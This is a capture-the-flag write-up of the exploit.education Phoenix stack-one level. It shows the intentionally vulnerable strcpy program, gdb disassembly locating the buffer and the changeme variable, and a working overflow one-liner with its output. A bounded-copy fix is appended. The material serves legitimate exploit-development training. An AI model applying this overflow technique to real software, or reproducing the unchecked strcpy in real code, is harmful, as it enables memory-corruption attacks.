1. intro

2. Code and analysis
2.1. C code
/*
 * phoenix/stack-one, by https://exploit.education
 *
 * The aim is to change the contents of the changeme variable to 0x496c5962
 *
 * Did you hear about the kid napping at the local school?
 * It's okay, they woke up.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int changeme;
  } locals;

  printf("%s\n", BANNER);

  if (argc < 2) {
    errx(1, "specify an argument, to be copied into the \"buffer\"");
  }

  locals.changeme = 0;
  strcpy(locals.buffer, argv[1]);

  if (locals.changeme == 0x496c5962) {
    puts("Well done, you have successfully set changeme to the correct value");
  } else {
    printf("Getting closer! changeme is currently 0x%08x, we want 0x496c5962\n",
           locals.changeme);
  }

  exit(0);
}
2.2. Analysis
This time the program takes a value as a command-line argument and copies it into locals.buffer; the level is solved when locals.changeme equals 0x496c5962.
3. Identifying the vulnerability and preparing the attack
3.1. Vulnerability
As in the previous level, strcpy copies without checking the size of the destination, so data past the end of the buffer overwrites neighbouring stack addresses.
3.2. Attack preparation
Likewise, all that is needed is to confirm the stack positions with gdb.
...
0x00000000004006a0 <+51>: movl $0x0,-0x10(%rbp)                   # changeme = 0 lives at rbp-0x10
0x00000000004006a7 <+58>: mov -0x60(%rbp),%rax
0x00000000004006ab <+62>: add $0x8,%rax
0x00000000004006af <+66>: mov (%rax),%rdx                         # load the value at rbp-0x60+8 (argv[1]) into rdx
0x00000000004006b2 <+69>: lea -0x50(%rbp),%rax                    # load the address rbp-0x50 (buffer) into rax
0x00000000004006b6 <+73>: mov %rdx,%rsi                           # rsi = src (argv[1])
0x00000000004006b9 <+76>: mov %rax,%rdi                           # rdi = dest (buffer)
0x00000000004006bc <+79>: callq 0x4004a0 <strcpy@plt>
0x00000000004006c1 <+84>: mov -0x10(%rbp),%eax
0x00000000004006c4 <+87>: cmp $0x496c5962,%eax                    # compare the value at rbp-0x10 (changeme)
...
Since strcpy copies src -> dest starting at rbp-0x50 and changeme sits at rbp-0x10, the two are 0x40 (64) bytes apart: the 4 bytes following 0x40 bytes of padding just need to hold the target value, written in little-endian byte order.
4. exploit
user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-one `python -c 'print "A"*0x40 + "\x62\x59\x6c\x49"'`
Welcome to phoenix/stack-one, brought to you by https://exploit.education
Well done, you have successfully set changeme to the correct value
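As an added example (not part of the original writeup or of the exploit.education level), here is the same copy with a bound taken from the destination size, so an argument of 64 bytes or more is rejected instead of spilling into changeme. The struct layout and the 64-byte buffer mirror the level; bounded_copy and run_level are names chosen here.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64

struct locals {
    char buffer[BUF_SIZE];
    volatile int changeme;
};

/* Copy src into dst (dst_size bytes) only if it fits, terminator included.
 * Returns 1 on success, 0 when the input is rejected; dst is untouched on 0. */
static int bounded_copy(char *dst, size_t dst_size, const char *src) {
    /* memchr never reads past dst_size bytes of src, unlike strlen/strcpy */
    const char *nul = memchr(src, '\0', dst_size);
    if (nul == NULL) {
        return 0;                    /* no NUL within dst_size: too long */
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);   /* includes the NUL */
    return 1;
}

/* Same control flow as the level's main(), with the bounded copy.
 * Returns changeme after the copy, or -1 if the argument was rejected. */
int run_level(const char *arg) {
    struct locals locals;
    locals.changeme = 0;
    if (!bounded_copy(locals.buffer, sizeof locals.buffer, arg)) {
        fprintf(stderr, "argument too long (max %d bytes)\n", BUF_SIZE - 1);
        return -1;
    }
    return locals.changeme;          /* the copy can no longer reach this field */
}

int main(void) {
    /* constructed sample inputs: one that fits, one that would have run
       into changeme under the original strcpy */
    char fits[BUF_SIZE];
    char too_long[BUF_SIZE + 8];
    memset(fits, 'A', sizeof fits - 1);
    fits[sizeof fits - 1] = '\0';
    memset(too_long, 'A', sizeof too_long - 1);
    too_long[sizeof too_long - 1] = '\0';
    printf("63 bytes -> changeme = %d\n", run_level(fits));
    printf("71 bytes -> result   = %d\n", run_level(too_long));
    return 0;
}
```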